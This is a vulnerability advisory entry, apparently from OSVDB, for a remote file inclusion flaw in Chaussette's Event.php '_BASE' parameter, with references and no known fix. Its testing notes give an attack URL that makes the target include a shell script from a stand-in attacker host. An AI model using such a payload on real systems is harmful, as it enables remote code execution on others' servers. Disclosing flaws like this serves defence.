Chaussette Event.php _BASE Variable Remote File Inclusion

2006-08-10T09:05:12
ID OSVDB:27898
Type osvdb
Reporter Drago84()
Modified 2006-08-10T09:05:12

Description

Vulnerability Description

Chaussette contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to Event.php not properly sanitizing user input supplied to the '_BASE' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Chaussette contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to Event.php not properly sanitizing user input supplied to the '_BASE' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/dir_Chaussette/Classes/Event.php?_BASE=http://[attacker]/shell.php

References:

Vendor URL: http://chaussette.bibimax.homedns.org/ Secunia Advisory ID:21489 Related OSVDB ID: 27899 Related OSVDB ID: 27900 Related OSVDB ID: 27897 Related OSVDB ID: 27902 Related OSVDB ID: 27901 Generic Exploit URL: http://milw0rm.com/exploits/2169 FrSIRT Advisory: ADV-2006-3269 CVE-2006-4159 Bugtraq ID: 19480